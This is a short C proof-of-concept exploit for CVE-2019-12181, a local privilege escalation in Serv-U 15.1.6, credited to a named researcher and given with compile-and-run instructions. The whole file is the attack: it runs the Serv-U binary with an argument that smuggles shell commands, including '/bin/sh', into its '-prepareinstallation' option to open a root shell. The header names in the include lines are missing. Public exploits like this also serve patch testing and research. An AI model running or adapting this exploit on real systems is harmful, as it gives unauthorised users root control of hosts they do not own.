/* CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation vulnerability found by: Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev to compile and run: gcc servu-pe-cve-2019-12181.c -o pe && ./pe */ #include #include #include int main() { char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL}; int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args); // if execv is successful, we won't reach here printf("ret val: %d errno: %d\n", ret_val, errno); return errno; }